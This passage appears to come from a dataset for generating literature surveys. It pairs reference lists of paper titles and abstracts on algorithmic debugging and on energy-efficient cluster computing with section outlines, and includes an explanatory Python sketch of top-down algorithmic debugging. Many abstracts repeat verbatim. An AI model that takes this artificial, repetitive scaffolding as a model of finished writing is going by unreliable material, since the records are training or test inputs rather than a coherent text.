a suitable foundation for a general-purpose debugger for lazy functional languages. Yet, the only readily available, general-purpose debugging tools for this class of languages are simple, operational tracers.This thesis presents a technique for debugging lazy functional programs declaratively and an efficient implementation of a declarative debugger for a large subset of Haskell. As far as we know, this is the first implementation of such a debugger which is sufficiently efficient to be useful in practice. Our approach is to construct a declarative trace which hides the operational details, and then use this as the input to a declarative (in our case algorithmic) debugger.The main contributions of this thesis are:A basis for declarative debugging of lazy functional programs is developed in the form of a trace which hides operational details. We call this kind of trace the Evaluation Dependence Tree (EDT).We show how to construct EDTs efficiently in the context of implementations of lazy functional languages based on graph reduction. 
Our implementation shows that the time penalty for tracing is modest, and that the space cost can be kept below a user definable limit by storing one portion of the EDT at a time.Techniques for reducing the size of the EDT are developed based on declaring modules to be trusted and designating certain functions as starting-points for tracing.We show how to support source-level debugging within our framework. A large subset of Haskell is handled, including list comprehensions.Language implementations are discussed from a debugging perspective, in particular what kind of support a debugger needs from the compiler and the run-time system.We present a working reference implementation consisting of a compiler for a large subset of Haskell and an algorithmic debugger. The compiler generates fairly good code, also when a program is compiled for debugging, and the resource consumption during debugging is modest. The system thus demonstrates the feasibility of our approach. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: GIDTS: a graphical programming environment for Prolog paper_content: This paper puts forward the Graphical Interactive Diagnosing, Testing and Slicing System (GIDTS) which is a graphical programming environment for PROLOG programs. The IDTSpart of the system integrates Shapiro's Interactive Diagnosis Algorithm with the Category Partition Testing Method (CPM) and a slicing technique performing the algorithmic debugging and functional testing of PROLOG programs. The integration of IDTS with a graphical user interface (GUI) supports the whole functionality of IDTS and provides a user-friendly environment giving the user more information on the state of the debugging process. GIDTS extends IDTS to a complete programming environment. It allows one to handle the debugging of complex programs using the extended syntax and semantics of PROLOG in a very flexible way. A static code diagnosis has also been implemented. 
In addition GIDTS supports debugging-directed editing of the source program, and a quick source code navigation via any of the tools (for example: the debugger, the static call graph and the information retriever). All these features are supported by the graphical user interface. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Multiple-View Tracing for Haskell: a New Hat paper_content: Different tracing systems for Haskell give different views of a program at work. In practice, several views are complementary and can productively be used together. Until now each system has generated its own trace, containing only the information needed for its particular view. Here we present the design of a trace that can serve several views. The trace is generated and written to file as the computation proceeds. We have implemented both the generation of the trace and several different viewers. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. 
Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: A Generalised Query Minimisation for Program Debugging paper_content: Shapiro proposed an algorithm called ‘Divide-and-Query’ which gives a good solution for query minimisation in the context of algorithmic program debugging. His algorithm applies a half-splitting strategy which repeatedly subdivides an AND-tree representing an incorrect computation under the guidance of an oracle until the bug responsible has been localised. His aim was to minimise the number of queries asked of the oracle, and in general his method approximates well to this ideal. There are cases, however, in which it divides the tree suboptimally with the consequence that more queries are posed than are necessary. --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: Combining algorithmic debugging and program slicing paper_content: Currently, program slicing and algorithmic debugging are two of the most relevant debugging techniques for declarative languages. They help programmers to find bugs in a semiautomatic manner. On the one hand, program slicing is a technique to extract those program fragments that (potentially) affect the values computed at some point of interest. On the other hand, algorithmic debugging is able to locate a bug by automatically generating a series of questions and processing the programmer's answers. In this work, we show for functional languages how the combination of both techniques produces a more powerful debugging schema that reduces the number of questions that programmers must answer to locate a bug --- paper_title: Generalized algorithmic debugging and testing paper_content: This paper presents a method for semi-automatic bug localization, generalized algorithmic debugging, which has been integrated with the category partition method for functional testing. In this way the efficiency of the algorithmic debugging method for bug localization can be improved by using test specifications and test results. The long-range goal of this work is a semi-automatic debugging and testing system which can be used during large-scale program development of nontrivial programs. The method is generally applicable to procedural languages and is not dependent on any ad hoc assumptions regarding the subject program. The original form of algorithmic debugging, introduced by Shapiro, was however limited to small Prolog programs without side-effects, but has later been generalized to concurrent logic programming languages. Another drawback of the original method is the large number of interactions with the user during bug localization. 
To our knowledge, this is the first method which uses category partition testing to improve the bug localization properties of algorithmic debugging. The method can avoid irrelevant questions to the programmer by categorizing input parameters and then match these against test cases in the test database. Additionally, we use program slicing, a data flow analysis technique, to dynamically compute which parts of the program are relevant for the search, thus further improving bug localization. We believe that this is the first generalization of algorithmic debugging for programs with side-effects written in imperative languages such as Pascal. These improvements together makes it more feasible to debug larger programs. However, additional improvements are needed to make it handle pointer-related side-effects and concurrent Pascal programs. A prototype generalized algorithmic debugger for a Pascal subset without pointer side-effects and a test case generator for application programs in Pascal, C, dBase, and LOTUS have been implemented. --- paper_title: Combining algorithmic debugging and program slicing paper_content: Currently, program slicing and algorithmic debugging are two of the most relevant debugging techniques for declarative languages. They help programmers to find bugs in a semiautomatic manner. On the one hand, program slicing is a technique to extract those program fragments that (potentially) affect the values computed at some point of interest. On the other hand, algorithmic debugging is able to locate a bug by automatically generating a series of questions and processing the programmer's answers. In this work, we show for functional languages how the combination of both techniques produces a more powerful debugging schema that reduces the number of questions that programmers must answer to locate a bug --- paper_title: Hat-Delta — One Right Does Make a Wrong paper_content: We outline two methods for locating bugs in a program. This is done by comparing computations of the same program with different input. At least one of these computations must produce a correct result, while exactly one must exhibit some erroneous behaviour. Firstly reductions that are thought highly likely to be correct are eliminated from the search for the bug. Secondly, a program slicing technique is used to identify areas of code that are likely to be correct. Both methods have been implemented. In combination with algorithmic debugging they provide a system that quickly and accurately identifies bugs. --- paper_title: An algorithmic debugger for Java paper_content: This work presents DDJ, an algorithmic debugger for Java. The main advantage of DDJ with respect to previous algorithmic debuggers is its scalability. DDJ has a new architecture based on the use of cache memories that allows it to scale both in time and memory. In addition, it includes new techniques that allow the debugger to start the debugging session even before the execution tree has been produced. We present the new architecture, and describe the main features of this debugger together with a usage scenario. ---
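The algorithmic debugging references above share one core loop: record an execution tree, ask an oracle (usually the programmer) whether individual calls returned correct results, and report a node whose own result is wrong while all of its children are correct. The sketch below shows that loop in its simplest top-down form; the tree encoding, the interactive oracle, and the naive traversal order are simplifying assumptions (strategies such as Shapiro's divide-and-query instead pick query nodes that roughly halve the remaining search space).

```python
# Schematic top-down algorithmic debugging over an execution tree.
# Simplified sketch: real debuggers build the tree from an instrumented
# run and use smarter query-selection strategies to ask fewer questions.
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Node:
    call: str                       # e.g. "insert(3, [1, 2])"
    result: str                     # value the call returned
    children: List["Node"] = field(default_factory=list)

def ask_oracle(node: Node) -> bool:
    """Ask the user whether this call produced the expected result."""
    answer = input(f"Is `{node.call} = {node.result}` correct? [y/n] ")
    return answer.strip().lower().startswith("y")

def find_buggy_node(node: Node) -> Optional[Node]:
    """Return a buggy node, or None if this subtree is judged correct.

    A node is buggy when its own result is wrong but every child's result
    is correct: the error must then originate in that node's own code.
    """
    if ask_oracle(node):
        return None                 # whole subtree judged correct
    for child in node.children:
        culprit = find_buggy_node(child)
        if culprit is not None:
            return culprit          # bug lies inside a child's subtree
    return node                     # wrong result, correct children => bug here

if __name__ == "__main__":
    tree = Node("sort([3, 1, 2])", "[3, 1, 2]", [
        Node("insert(3, [1, 2])", "[3, 1, 2]",
             [Node("insert(3, [2])", "[3, 2]")]),
        Node("sort([1, 2])", "[1, 2]"),
    ])
    buggy = find_buggy_node(tree)
    print("Buggy call:", buggy.call if buggy else "none found")
```

Because every answered question removes a subtree from consideration, the number of questions asked, rather than execution time, is the cost that the search strategies surveyed in this row try to minimize.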
Title: A Survey on Algorithmic Debugging Strategies Section 1: Introduction Description 1: This section introduces the concept of algorithmic debugging, its historical context, and provides an overview of the paper. It briefly reviews the evolution of algorithmic debugging and sets the stage for the detailed discussion of search strategies. Section 2: Algorithmic Debugging Description 2: This section explains the methodology of algorithmic debugging, including its architecture, the construction of the execution tree (ET), and the process of isolating buggy code through programmer questions. Section 3: Search Strategies for Algorithmic Debugging Description 3: This section delves into various search strategies used in algorithmic debugging. It describes and compares each strategy, detailed with examples and their implications on debugging performance. Section 4: A Comparison of Search Strategies Description 4: This section provides a comparative analysis of the discussed search strategies. It evaluates the efficiency and effectiveness of each strategy based on several metrics and practical scenarios. Section 5: Empirical Evaluation of Algorithmic Debugging Strategies Description 5: This section presents the results of empirical evaluations conducted to measure the performance of different algorithmic debugging strategies. It discusses the benchmarks used, experimental setup, and findings. Section 6: Conclusions and Future Work Description 6: This section summarizes the key findings of the survey, discusses the implications of the comparative analysis, and suggests potential directions for future research in algorithmic debugging strategies.
An overview of energy efficiency techniques in cluster computing systems
9
--- paper_title: The Green500 List: Encouraging Sustainable Supercomputing paper_content: The performance-at-any-cost design mentality ignores supercomputers' excessive power consumption and need for heat dissipation and will ultimately limit their performance. Without fundamental change in the design of supercomputing systems, the performance advances common over the past two decades won't continue. The HPC community needs a Green500 List to rank supercomputers on speed and power requirements and to supplement the TOP500 List. Vendors and system architects worldwide take substantial pride and invest tremendous effort toward making the biannual TOP500 List. We anticipate that the Green500 List effort will do the same and encourage the HPC community and operators of Internet data centers to design more power-efficient supercomputers and large-scale data centers. --- paper_title: High Performance Cluster Computing: Architectures and Systems paper_content: Rapid improvements in network and processor performance are revolutionizing high performance computing, transforming clustered commodity workstations into the supercomputing solution of choice. This book brings together contributions from more than 100 leading practitioners, offering a single source for up-to-the-minute information on virtually every key system-related issue in high performance cluster computing. The book contains expert coverage of "commodity supercomputing" systems and architectures; Internet-based wide area "metacomputing" systems; the role of Java; new applications and algorithms; advanced techniques for enhancing availability and throughput, and much more. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: High-performance, power-aware distributed computing for scientific applications paper_content: The PowerPack framework enables distributed systems to profile, analyze, and conserve energy in scientific applications using dynamic voltage scaling. For one common benchmark, the framework achieves more than 30 percent energy savings with minimal performance impact.
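Several of the DVS papers cited here rely on the same basic observation: dynamic CPU power grows roughly as C·V²·f, while the off-chip (memory or communication) part of a phase does not speed up with frequency, so memory-bound phases can be run at a lower gear with little slowdown. The following Python sketch illustrates that reasoning under stated assumptions; the gear table, capacitance constant, and timing model are made-up illustrative values, not figures from any of the cited systems:

```python
# Hypothetical operating points (frequency in GHz, core voltage in V) and an
# arbitrary capacitance constant; only relative energies matter here.
GEARS = [(0.8, 0.9), (1.2, 1.0), (1.6, 1.1), (2.0, 1.2)]
F_MAX = 2.0
CAPACITANCE = 1.0

def phase_time(f_ghz, cpu_time, offchip_time):
    """Only the on-chip (CPU-bound) part scales with frequency; off-chip
    memory/communication time does not."""
    return cpu_time * (F_MAX / f_ghz) + offchip_time

def dynamic_energy(f_ghz, volts, duration):
    """P_dyn is roughly C * V^2 * f, so E is roughly C * V^2 * f * t."""
    return CAPACITANCE * volts * volts * f_ghz * duration

def pick_gear(cpu_time, offchip_time, max_slowdown=0.05):
    """Lowest-energy gear whose slowdown relative to F_MAX stays within bound."""
    base = phase_time(F_MAX, cpu_time, offchip_time)
    best = None
    for f, v in GEARS:
        t = phase_time(f, cpu_time, offchip_time)
        if (t - base) / base > max_slowdown:
            continue                      # violates the performance constraint
        e = dynamic_energy(f, v, t)
        if best is None or e < best[1]:
            best = ((f, v), e, t)
    return best

# A memory-bound phase (1 s of CPU work, 4 s of off-chip stalls) fits a lower
# gear inside a 5% slowdown budget, cutting modeled energy versus full speed:
print(pick_gear(cpu_time=1.0, offchip_time=4.0))
```

The runtime schedulers surveyed below apply this kind of per-phase or per-interval selection using measured stall and communication times rather than assumed ones.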
--- paper_title: Power Aware Scheduling of Bag-of-Tasks Applications with Deadline Constraints on DVS-enabled Clusters paper_content: Power-aware scheduling problem has been a recent issue in cluster systems not only for operational cost due to electricity cost, but also for system reliability. As recent commodity processors support multiple operating points under various supply voltage levels, Dynamic Voltage Scaling (DVS) scheduling algorithms can reduce power consumption by controlling appropriate voltage levels. In this paper, we provide power-aware scheduling algorithms for bag-of-tasks applications with deadline constraints on DVS-enabled cluster systems in order to minimize power consumption as well as to meet the deadlines specified by application users. A bag-of-tasks application should finish all the sub-tasks before the deadline, so that the DVS scheduling scheme should consider the deadline as well. We provide the DVS scheduling algorithms for both time-shared and space-shared resource sharing policies. The simulation results show that the proposed algorithms reduce much power consumption compared to static voltage schemes. --- paper_title: Making cluster applications energy-aware paper_content: Power consumption has become a critical issue in large scale clusters. Existing solutions for addressing the servers' energy consumption suggest "shrinking" the set of active machines, at least until the more power-proportional hardware devices become available. This paper demonstrates that leveraging the sleeping state, however, may lead to unacceptably poor performance and low data availability if the distributed services are not aware of the power management's actions. Therefore, we present an architecture for cluster services in which the deployed services overcome this problem by actively participating in any action taken by the power management. We propose, implement, and evaluate modifications for the Hadoop Distributed File System and the MapReduce clone that make them capable of operating efficiently under limited power budgets. --- paper_title: A taxonomy of market-based resource management systems for utility-driven cluster computing paper_content: In utility-driven cluster computing, cluster Resource Management Systems (RMSs) need to know the specific needs of different users in order to allocate resources according to their needs. This in turn is vital to achieve service-oriented Grid computing that harnesses resources distributed worldwide based on users' objectives. Recently, numerous market-based RMSs have been proposed to make use of real-world market concepts and behavior to assign resources to users for various computing platforms. The aim of this paper is to develop a taxonomy that characterizes and classifies how market-based RMSs can support utility-driven cluster computing in practice. The taxonomy is then mapped to existing market-based RMSs designed for both cluster and other computing platforms to survey current research developments and identify outstanding issues. Copyright © 2006 John Wiley & Sons, Ltd. --- paper_title: A Taxonomy and Survey of Energy-Efficient Data Centers and Cloud Computing Systems paper_content: Abstract Traditionally, the development of computing systems has been focused on performance improvements driven by the demand of applications from consumer, scientific, and business domains. 
However, the ever-increasing energy consumption of computing systems has started to limit further performance growth due to overwhelming electricity bills and carbon dioxide footprints. Therefore, the goal of the computer system design has been shifted to power and energy efficiency. To identify open challenges in the area and facilitate future advancements, it is essential to synthesize and classify the research on power- and energy-efficient design conducted to date. In this study, we discuss causes and problems of high power/energy consumption, and present a taxonomy of energy-efficient design of computing systems covering the hardware, operating system, virtualization, and data center levels. We survey various key works in the area and map them onto our taxonomy to guide future design and development efforts. This chapter concludes with a discussion on advancements identified in energy-efficient computing and our vision for future research directions. --- paper_title: Single System Image --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: Determining the Minimum Energy Consumption using Dynamic Voltage and Frequency Scaling paper_content: While improving raw performance is of primary interest to most users of high-performance computers, energy consumption also is a critical concern. Some microprocessors allow voltage and frequency scaling, which enables a system to reduce CPU power and performance when the CPU is not on the critical path. When properly directed, such dynamic voltage and frequency scaling can produce significant energy savings with little performance penalty. Various DVFS scaling algorithms have been proposed. However, the benefit is application-dependent.
It is not clear whether they achieve the minimum possible energy consumption, so it is important to establish a baseline for DVFS scheduling for any application. This paper determines minimum energy consumption in voltage and frequency scaling systems for a given time delay. We assume we have a set of fixed points where scaling can occur. A brute-force solution is intractable even for a moderately sized set (although all programs presented in this paper can be solved by brute force). Our algorithm uses estimation to efficiently choose the exact optimal schedule satisfying the given time constraint. In addition, the time and energy estimates for the optimal schedule are reasonably accurate, with differences of at most 1.48%. --- paper_title: High-Density Computing: A 240-Processor Beowulf in One Cubic Meter paper_content: We present results from computations on Green Destiny, a 240-processor Beowulf cluster which is contained entirely within a single 19-inch wide 42U rack. The cluster consists of 240 Transmeta TM5600 667-MHz CPUs mounted on RLX Technologies motherboard blades. The blades are mounted side-by-side in an RLX 3U rack-mount chassis, which holds 24 blades. The overall cluster contains 10 chassis and associated Fast and Gigabit Ethernet switches. The system has a footprint of 0.5 m² (6 square feet), a volume of 0.85 m³ (30 cubic feet) and a measured power dissipation under load of 5200 watts (including network switches). We have measured the performance of the cluster using a gravitational treecode N-body simulation of galaxy formation using 200 million particles, which sustained an average of 38.9 Gflops on 212 nodes of the system. We also present results from a three-dimensional hydrodynamic simulation of a core-collapse supernova. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: State of the Art of Power Saving in Clusters and Results from the EDF Case Study paper_content: Energy management for mobile devices has been traditionally a well studied topic during the last two decades, as these devices usually do not have a permanent connection to the power grid and thus solely rely on the limited battery charge.
However, this trend has been mostly disregarded in the context of HPC systems as the main focus mainly relied on improving the performance at any cost. Therefore, energy costs for operating and cooling the equipment of current data centers have increased significantly up to a point where they are able to surpass the hardware acquisition costs. In this work we survey the current energy conservation efforts in distributed systems. Hence, we start our work with the introduction of the basic principles of power and energy management. This involves the distinguishing between the two often misleading terms power and energy management. Furthermore, we present several approaches on how to measure the power consumption at system and component level. Moreover, in order to get a deeper understanding on where the most of the power is spent within a server, we take a closer look at its components (i.e. CPU, RAM, etc.) and outline the currently available energy-saving mechanisms. Given that energy consumption strongly depends on the workload characteristics we also discuss the different types of workloads (i.e. mobile, commercial and scientific). Afterwards, we continue with the current approaches for energy savings in distributed systems by focusing on both node and cluster-level efforts. Finally, we finish this survey with an outline of some open challenges and the introduction of the EcoGrappe project. Thereby, we detail its objectives and present some of the work done at our project partner EDF. --- paper_title: Energy-efficient cluster computing with FAWN: Workloads and implications paper_content: This paper presents the architecture and motivation for a cluster-based, many-core computing architecture for energy-efficient, data-intensive computing. FAWN, a Fast Array of Wimpy Nodes, consists of a large number of slower but efficient nodes coupled with low-power storage. We present the computing trends that motivate a FAWN-like approach, for CPU, memory, and storage. We follow with a set of microbenchmarks to explore under what workloads these "wimpy nodes" perform well (or perform poorly). We conclude with an outline of the longer-term implications of FAWN that lead us to select a tightly integrated stacked chip-and-memory architecture for future FAWN development. --- paper_title: Memory-miser: a performance-constrained runtime system for power-scalable clusters paper_content: Main memory in clusters may dominate total system power. The resulting energy consumption increases system operating cost and the heat produced reduces reliability. Emergent memory technology will provide servers with the ability to dynamically turn-on (online) and turn-off (offline) memory devices at runtime. This technology, coupled with slack in memory demand, offers the potential for significant energy savings in clusters of servers. Enabling power-aware memory and conserving energy in clusters are non-trivial. First, power-aware memory techniques must be scalable to thousands of devices. Second, techniques must not negatively impact the performance of parallel scientific applications. Third, techniques must be transparent to the user to be practical. We propose a Memory Management Infra-Structure for Energy Reduction (Memory MISER). Memory MISER is transparent, performance-neutral, and scalable. It consists of a prototype Linux kernel that manages memory at device granularity and a userspace daemon that monitors memory demand systemically to control devices and implement energy- and performance-constrained policies. 
Experiments on an 8-node cluster show our control daemon reduces memory energy up to 56.8% with --- paper_title: FAWN: a fast array of wimpy nodes paper_content: This paper presents a new cluster architecture for low-power data-intensive computing. FAWN couples low-power embedded CPUs to small amounts of local flash storage, and balances computation and I/O capabilities to enable efficient, massively parallel access to data. The key contributions of this paper are the principles of the FAWN architecture and the design and implementation of FAWN-KV--a consistent, replicated, highly available, and high-performance key-value storage system built on a FAWN prototype. Our design centers around purely log-structured datastores that provide the basis for high performance on flash storage, as well as for replication and consistency obtained using chain replication on a consistent hashing ring. Our evaluation demonstrates that FAWN clusters can handle roughly 350 key-value queries per Joule of energy--two orders of magnitude more than a disk-based system. --- paper_title: A Feasibility Analysis of Power Awareness in Commodity-Based High-Performance Clusters paper_content: We present a feasibility study of a power-reduction scheme that reduces the thermal power of processors by lowering frequency and voltage in the context of high-performance computing. The study revolves around a 16-processor Opteron-based Beowulf cluster, configured as four nodes of quad-processors, and shows that one can easily reduce a significant amount of CPU and system power dissipation and its associated energy costs while still maintaining high performance. Specifically, our study shows that a 5% performance slowdown can be traded off for an average of 19% system energy savings and 24% system power reduction. These preliminary empirical results, via real measurements, are encouraging because hardware failures often occur when the cluster is running hot, i.e, when the workload is heavy, and the new power-reduction scheme can effectively reduce a cluster's power demands during these busy periods --- paper_title: Gordon: using flash memory to build fast, power-efficient clusters for data-intensive applications paper_content: As our society becomes more information-driven, we have begun to amass data at an astounding and accelerating rate. At the same time, power concerns have made it difficult to bring the necessary processing power to bear on querying, processing, and understanding this data. We describe Gordon, a system architecture for data-centric applications that combines low-power processors, flash memory, and data-centric programming systems to improve performance for data-centric applications while reducing power consumption. The paper presents an exhaustive analysis of the design space of Gordon systems, focusing on the trade-offs between power, energy, and performance that Gordon must make. It analyzes the impact of flash-storage and the Gordon architecture on the performance and power efficiency of data-centric applications. It also describes a novel flash translation layer tailored to data intensive workloads and large flash storage arrays. Our data show that, using technologies available in the near future, Gordon systems can out-perform disk-based clusters by 1.5× and deliver up to 2.5× more performance per Watt. --- paper_title: Dynamic cluster reconfiguration for power and performance paper_content: In this chapter we address power conservation for clusters of workstations or PCs. 
Our approach is to develop systems that dynamically turn cluster nodes on - to be able to handle the load imposed on the system efficiently - and off - to save power under lighter load. The key component of our systems is an algorithm that makes cluster reconfiguration decisions by considering the total load imposed on the system and the power and performance implications of changing the current configuration. The algorithm is implemented in two common cluster-based systems: a network server and an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: Load Balancing and Unbalancing for Power and Performance in Cluster-Based Systems paper_content: In this paper we address power conservation for clusters of workstations or PCs. Our approach is to develop systems that dynamically turn cluster nodes on – to be able to handle the load imposed on the system efficiently – and off – to save power under lighter load. The key component of our systems is an algorithm that makes load balancing and unbalancing decisions by considering both the total load imposed on the cluster and the power and performance implications of turning nodes off. The algorithm is implemented in two different ways: (1) at the application level for a cluster-based, localityconscious network server; and (2) at the operating system level for an operating system for clustered cycle servers. Our experimental results are very favorable, showing that our systems conserve both power and energy in comparison to traditional systems. --- paper_title: A Taxonomy and Survey of Energy-Efficient Data Centers and Cloud Computing Systems paper_content: Abstract Traditionally, the development of computing systems has been focused on performance improvements driven by the demand of applications from consumer, scientific, and business domains. However, the ever-increasing energy consumption of computing systems has started to limit further performance growth due to overwhelming electricity bills and carbon dioxide footprints. Therefore, the goal of the computer system design has been shifted to power and energy efficiency. To identify open challenges in the area and facilitate future advancements, it is essential to synthesize and classify the research on power- and energy-efficient design conducted to date. In this study, we discuss causes and problems of high power/energy consumption, and present a taxonomy of energy-efficient design of computing systems covering the hardware, operating system, virtualization, and data center levels. We survey various key works in the area and map them onto our taxonomy to guide future design and development efforts. This chapter concludes with a discussion on advancements identified in energy-efficient computing and our vision for future research directions. --- paper_title: Improvement of power-performance efficiency for high-end computing paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. Recent work has shown application characteristics of single-processor, memory-bound non-interactive codes and distributed, interactive Web services can be exploited to conserve power and energy with minimal performance impact. 
Our novel approach is to exploit parallel performance inefficiencies characteristic of non-interactive, distributed scientific applications, conserving energy using DVS (dynamic voltage scaling) without impacting time-to-solution (ITS) significantly, reducing cost and improving reliability. We present a software framework to analyze and optimize distributed power-performance using DVS implemented on a 16-node Centrino-based cluster. Using various DVS strategies we achieve application-dependent overall system energy savings as large as 25% with as little as 2% performance impact. --- paper_title: Performance-constrained Distributed DVS Scheduling for Scientific Applications on Power-aware Clusters paper_content: Left unchecked, the fundamental drive to increase peak performance using tens of thousands of power hungry components will lead to intolerable operating costs and failure rates. High-performance, power-aware distributed computing reduces power and energy consumption of distributed applications and systems without sacrificing performance. Generally, we use DVS (Dynamic Voltage Scaling) technology now available in high-performance microprocessors to reduce power consumption during parallel application runs when peak CPU performance is not necessary due to load imbalance, communication delays, etc. We propose distributed performance-directed DVS scheduling strategies for use in scalable power-aware HPC clusters. By varying scheduling granularity we can obtain significant energy savings without increasing execution time (36% for FT from NAS PB). We created a software framework to implement and evaluate our various techniques and show performance-directed scheduling consistently saves more energy (nearly 25% for several codes) than comparable approaches with less impact on execution time (< 5%). Additionally, we illustrate the use of energy-delay products to automatically select distributed DVS schedules that meet users' needs. --- paper_title: Memory-miser: a performance-constrained runtime system for power-scalable clusters paper_content: Main memory in clusters may dominate total system power. The resulting energy consumption increases system operating cost and the heat produced reduces reliability. Emergent memory technology will provide servers with the ability to dynamically turn-on (online) and turn-off (offline) memory devices at runtime. This technology, coupled with slack in memory demand, offers the potential for significant energy savings in clusters of servers. Enabling power-aware memory and conserving energy in clusters are non-trivial. First, power-aware memory techniques must be scalable to thousands of devices. Second, techniques must not negatively impact the performance of parallel scientific applications. Third, techniques must be transparent to the user to be practical. We propose a Memory Management Infra-Structure for Energy Reduction (Memory MISER). Memory MISER is transparent, performance-neutral, and scalable. It consists of a prototype Linux kernel that manages memory at device granularity and a userspace daemon that monitors memory demand systemically to control devices and implement energy- and performance-constrained policies. 
